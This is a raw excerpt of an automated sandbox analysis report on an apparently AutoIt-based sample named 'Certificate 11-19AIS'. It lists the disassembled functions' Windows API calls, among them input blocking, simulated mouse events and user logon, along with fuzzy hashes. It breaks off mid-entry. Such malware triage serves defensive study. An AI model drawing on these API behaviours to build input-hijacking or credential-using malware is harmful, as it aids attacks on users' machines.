                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f423544dea087a74329dcc553a3529d50a2b5e8156fea4b14b64fc8430227a2e
                                                                              • Instruction ID: c30ec4421f3e2ec2b0d1726b98c102d4ea723819bf920d8dae0f4bd3270c1c2f
                                                                              • Opcode Fuzzy Hash: f423544dea087a74329dcc553a3529d50a2b5e8156fea4b14b64fc8430227a2e
                                                                              • Instruction Fuzzy Hash: 55B1E225D2AF414ED7239639883133AB65CBFBB2D5F91D71BFC1A74D62EB2185838180
                                                                              APIs
                                                                              • __time64.LIBCMT ref: 007FB6DF
                                                                                • Part of subcall function 007D344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,007FBDC3,00000000,?,?,?,?,007FBF70,00000000,?), ref: 007D3453
                                                                                • Part of subcall function 007D344A: __aulldiv.LIBCMT ref: 007D3473
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Time$FileSystem__aulldiv__time64
                                                                              • String ID:
                                                                              • API String ID: 2893107130-0
                                                                              • Opcode ID: 18a9809e372790180ce623520fc99e828f2d8147ca849c5777478f6cfe0b6a92
                                                                              • Instruction ID: dd3b9b17f763e86f4986ef5377d2bbf6a2d4894be0ded53d042dac1ff958fc07
                                                                              • Opcode Fuzzy Hash: 18a9809e372790180ce623520fc99e828f2d8147ca849c5777478f6cfe0b6a92
                                                                              • Instruction Fuzzy Hash: 9221A272634510CBC729CF38D881A62B7E1EB95310B248E6DE1E5CB2C0CB78F945DB54
                                                                              APIs
                                                                              • BlockInput.USER32(00000001), ref: 00806ACA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BlockInput
                                                                              • String ID:
                                                                              • API String ID: 3456056419-0
                                                                              • Opcode ID: c1fa80f8c468a321423e9e17ce9fb811f4358dd1e1097156437473eefb9d6c5f
                                                                              • Instruction ID: 5e3f17b3ef063d6018a50fe5669118d5a47a96648b11f3fb5feb78a5be904209
                                                                              • Opcode Fuzzy Hash: c1fa80f8c468a321423e9e17ce9fb811f4358dd1e1097156437473eefb9d6c5f
                                                                              • Instruction Fuzzy Hash: 65E01235300214AFC750EB69D809E96B7ECFFB4761B04841AE945D7291EAB4E8148BA0
                                                                              APIs
                                                                              • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 007F750A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: mouse_event
                                                                              • String ID:
                                                                              • API String ID: 2434400541-0
                                                                              • Opcode ID: 9f885c1d230abdee8a1a8bae89b81512f238e052dbb1eed1e9c763d5d081ae9b
                                                                              • Instruction ID: ad10467b1d7c140e6f8c910e3e17ef5d67d835164fd7466cce7537ae2b9407ff
                                                                              • Opcode Fuzzy Hash: 9f885c1d230abdee8a1a8bae89b81512f238e052dbb1eed1e9c763d5d081ae9b
                                                                              • Instruction Fuzzy Hash: 42D06CA526C64E69E82D4724AC1BFB61A08B340782FD48589B7229A2C0B8A86D25E031
                                                                              APIs
                                                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,007EAD3E), ref: 007EB124
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: LogonUser
                                                                              • String ID:
                                                                              • API String ID: 1244722697-0
                                                                              • Opcode ID: ebd71d6ce325559589680ebd418d31f0c3f63cbc5404bf7a9763eee18744d634
                                                                              • Instruction ID: 88d848f4e2fef3221faf71ada9fcc2b3342297e762689a236b528a0a1e4de8ad
                                                                              • Opcode Fuzzy Hash: ebd71d6ce325559589680ebd418d31f0c3f63cbc5404bf7a9763eee18744d634
                                                                              • Instruction Fuzzy Hash: B8D09E321A4A4EAEDF029FA4ED06EAE3F6AEB04B01F448511FA15D50A1C775D531AB50
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: NameUser
                                                                              • String ID:
                                                                              • API String ID: 2645101109-0
                                                                              • Opcode ID: d54492e61d4b9c96b255924eb602dd87b46b952fcf71a03cb8eddd972ece2163
                                                                              • Instruction ID: c2b9a579e02a61aff982ab93042a186614db05a7922f43334ead51bea29b850d
                                                                              • Opcode Fuzzy Hash: d54492e61d4b9c96b255924eb602dd87b46b952fcf71a03cb8eddd972ece2163
                                                                              • Instruction Fuzzy Hash: F9C04CB140051DDFC755DBC0D9449EEB7BCBB04705F105491A105F1110D7709B859B72
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 007D818F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: b9c29be62f3be2df2e420e13f5edf9326be91a30ea57a2dade291fa99cd86709
                                                                              • Instruction ID: 3553d5d937cb29ae91cd3544baa91a3dca520121443ff296526e701c84ce0199
                                                                              • Opcode Fuzzy Hash: b9c29be62f3be2df2e420e13f5edf9326be91a30ea57a2dade291fa99cd86709
                                                                              • Instruction Fuzzy Hash: A0A0113000030CAB8F002B82FC088883F2CFA802A0B008020F80C00220AB22A8208A82
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d7f857992e0ea3743eec83cc98971c0066f3cbb3629c8aab3c72ccfbfe1c6046
                                                                              • Instruction ID: 28d46a5c54434190dd40dd8cc2a864469ad89f01b8b528d17ea4f62eb0ea80bc
                                                                              • Opcode Fuzzy Hash: d7f857992e0ea3743eec83cc98971c0066f3cbb3629c8aab3c72ccfbfe1c6046
                                                                              • Instruction Fuzzy Hash: 4A22AA70A0421ACFDB24DF58C484BEEB7B1FF18314F248169E95A9B351E739AD81CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3517b84c3cffb6199b54b56e1a136ef2418b5d78e038633ea3f92d3930ab3af6
                                                                              • Instruction ID: dd350d9c1145360ae32b4a093e049d03a2d2f978801febb87203ee54356e7ea7
                                                                              • Opcode Fuzzy Hash: 3517b84c3cffb6199b54b56e1a136ef2418b5d78e038633ea3f92d3930ab3af6
                                                                              • Instruction Fuzzy Hash: FE127C70A00219EFDF14DFA8D985AEEB7F5FF48300F108569E916E7250EB39A960CB50
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Exception@8Throwstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 3728558374-0
                                                                              • Opcode ID: 2a628eadda273261efe2044953d2860528dcff01427257c48e0befb7a8170130
                                                                              • Instruction ID: 1192c5fa87a08692726749b8c0d9e7559c0795c86937e24044ac44d8201f5260
                                                                              • Opcode Fuzzy Hash: 2a628eadda273261efe2044953d2860528dcff01427257c48e0befb7a8170130
                                                                              • Instruction Fuzzy Hash: 4002C3B0A00119EFDF14DF68D985BAEBBB5FF48300F108069E806DB255EB39DA55CB91
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                              • Instruction ID: c348153359127be6a4b962a173c5595f90317e80c62c86ad797f85bc67bf185c
                                                                              • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                                                                              • Instruction Fuzzy Hash: 38C1E7322051970ADF2D463AC434A3EFBB15E927B171A176ED8B3CB5D1EF28C524D660
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                              • Instruction ID: db9bb7ee0858f8c6defb8c478e51f0a0db3e2d5ffc8207fb1eea1bcf93261ebd
                                                                              • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                                                                              • Instruction Fuzzy Hash: 9EC1053220519709DF2D463AC43463EBBB15EA2BB170A236ED4B3CF2D5EF28D524D660
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                              • Instruction ID: 466141137a12780d743bb6e6bcb077f4160de8b0e8e7d25581c29e7015a4e397
                                                                              • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                              • Instruction Fuzzy Hash: 61C1A43220509709DF2D463AC474E3EFBA25AA2BB131A177DD8B3CB5D5EF28C564D620
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 0080A2FE
                                                                              • DeleteObject.GDI32(00000000), ref: 0080A310
                                                                              • DestroyWindow.USER32 ref: 0080A31E
                                                                              • GetDesktopWindow.USER32 ref: 0080A338
                                                                              • GetWindowRect.USER32(00000000), ref: 0080A33F
                                                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0080A480
                                                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0080A490
                                                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A4D8
                                                                              • GetClientRect.USER32(00000000,?), ref: 0080A4E4
                                                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0080A51E
                                                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A540
                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A553
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A55E
                                                                              • GlobalLock.KERNEL32(00000000), ref: 0080A567
                                                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A576
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0080A57F
                                                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A586
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0080A591
                                                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A5A3
                                                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0083D9BC,00000000), ref: 0080A5B9
                                                                              • GlobalFree.KERNEL32(00000000), ref: 0080A5C9
                                                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0080A5EF
                                                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0080A60E
                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A630
                                                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0080A81D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                              • String ID: $AutoIt v3$DISPLAY$static
                                                                              • API String ID: 2211948467-2373415609
                                                                              • Opcode ID: 93f1248f008fc01908e89cc9063e3d0e10388e4366376fda30376876937cae5e
                                                                              • Instruction ID: b57f1ec4b8131ed631acc541116a009135e2f8d4120018ef7017f954f96a555b
                                                                              • Opcode Fuzzy Hash: 93f1248f008fc01908e89cc9063e3d0e10388e4366376fda30376876937cae5e
                                                                              • Instruction Fuzzy Hash: 1F024875900208EFDB14DFA8DD89EAEBBB9FB48310F048558F915EB2A1D774AD41CB60
                                                                              APIs
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0081D2DB
                                                                              • GetSysColorBrush.USER32(0000000F), ref: 0081D30C
                                                                              • GetSysColor.USER32(0000000F), ref: 0081D318
                                                                              • SetBkColor.GDI32(?,000000FF), ref: 0081D332
                                                                              • SelectObject.GDI32(?,00000000), ref: 0081D341
                                                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0081D36C
                                                                              • GetSysColor.USER32(00000010), ref: 0081D374
                                                                              • CreateSolidBrush.GDI32(00000000), ref: 0081D37B
                                                                              • FrameRect.USER32(?,?,00000000), ref: 0081D38A
                                                                              • DeleteObject.GDI32(00000000), ref: 0081D391
                                                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0081D3DC
                                                                              • FillRect.USER32(?,?,00000000), ref: 0081D40E
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0081D439
                                                                                • Part of subcall function 0081D575: GetSysColor.USER32(00000012), ref: 0081D5AE
                                                                                • Part of subcall function 0081D575: SetTextColor.GDI32(?,?), ref: 0081D5B2
                                                                                • Part of subcall function 0081D575: GetSysColorBrush.USER32(0000000F), ref: 0081D5C8
                                                                                • Part of subcall function 0081D575: GetSysColor.USER32(0000000F), ref: 0081D5D3
                                                                                • Part of subcall function 0081D575: GetSysColor.USER32(00000011), ref: 0081D5F0
                                                                                • Part of subcall function 0081D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0081D5FE
                                                                                • Part of subcall function 0081D575: SelectObject.GDI32(?,00000000), ref: 0081D60F
                                                                                • Part of subcall function 0081D575: SetBkColor.GDI32(?,00000000), ref: 0081D618
                                                                                • Part of subcall function 0081D575: SelectObject.GDI32(?,?), ref: 0081D625
                                                                                • Part of subcall function 0081D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0081D644
                                                                                • Part of subcall function 0081D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0081D65B
                                                                                • Part of subcall function 0081D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0081D670
                                                                                • Part of subcall function 0081D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0081D698
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                              • String ID:
                                                                              • API String ID: 3521893082-0
                                                                              • Opcode ID: 80dbc4aea8a7cc7a61023a5297ee67eae232c405ae49ade35529509f11d0441d
                                                                              • Instruction ID: 8582253a2734b19a1d6ff8e59fe32ef365e7ef5af470b072b5b7f37b042d32e5
                                                                              • Opcode Fuzzy Hash: 80dbc4aea8a7cc7a61023a5297ee67eae232c405ae49ade35529509f11d0441d
                                                                              • Instruction Fuzzy Hash: 65916D72408305EFDB109F64EC48EABBBA9FF85325F100E19F966961A0D771D984CB52
                                                                              APIs
                                                                              • DestroyWindow.USER32 ref: 007CB98B
                                                                              • DeleteObject.GDI32(00000000), ref: 007CB9CD
                                                                              • DeleteObject.GDI32(00000000), ref: 007CB9D8
                                                                              • DestroyIcon.USER32(00000000), ref: 007CB9E3
                                                                              • DestroyWindow.USER32(00000000), ref: 007CB9EE
                                                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0082D2AA
                                                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0082D2E3
                                                                              • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0082D711
                                                                                • Part of subcall function 007CB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007CB759,?,00000000,?,?,?,?,007CB72B,00000000,?), ref: 007CBA58
                                                                              • SendMessageW.USER32 ref: 0082D758
                                                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0082D76F
                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0082D785
                                                                              • ImageList_Destroy.COMCTL32(00000000), ref: 0082D790
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1317614176.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1317596791.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000083D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317670300.000000000085E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317718112.000000000086A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1317738477.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7b0000_Certificate 11-19AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                              • String ID: 0
                                                                              • API String ID: 464785882-4108050209
                                                                              • Opcode ID: 48bf52a1303d0efddfb87421068d621ba5ee765c4db7038e7469f496c4a83b68
                                                                              • Instruction ID: 58c4de2897c6f241b29d737fd8e741b1785b12cda88aff5bd18b7dbffea08e6c
                                                                              • Opcode Fuzzy Hash: 48bf52a1303d0efddfb87421068d621ba5ee765c4db7038e7469f496c4a83b68
                                                                              • Instruction Fuzzy Hash: B2127770604321DFDB24DF28E889BA9BBE5FB55304F14456DF989CB262C735E882CB91
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 007FDBD6
                                                                              • GetDriveTypeW.KERNEL32(?,0084DC54,?,\\.\,0084DC00), ref: 007FDCC3
                                                                              • SetErrorMode.KERNEL32(00000000,0084DC54,?,\\.\,0084DC00), ref: 007FDE29
                                                                              Strings
                                                                              Memory Dump Source
